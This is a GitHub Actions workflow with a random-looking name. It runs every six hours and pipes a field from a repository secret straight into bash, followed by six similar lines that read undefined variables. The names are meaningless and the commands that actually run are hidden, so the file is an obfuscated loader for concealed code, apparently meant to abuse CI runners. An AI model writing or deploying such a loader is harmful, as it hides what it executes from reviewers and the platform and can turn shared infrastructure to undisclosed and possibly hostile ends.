name: zhaozilong7182

on:
  workflow_dispatch:
  schedule:
    - cron: '13 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhaozilong7182
        env:
          tqyvo77: ${{ secrets.tqyvo77 }}
        run: |
          echo $tqyvo77 | jq -r .uj088 | /bin/bash
          echo $e3 | jq -r .ia638 | /bin/bash
          echo $jgou2894 | jq -r .geylp33 | /bin/bash
          echo $ll51 | jq -r .xho0 | /bin/bash
          echo $ehmi6745 | jq -r .cqu24 | /bin/bash
          echo $msf880 | jq -r .ft9059 | /bin/bash
          echo $qwz5436 | jq -r .xh58773 | /bin/bash

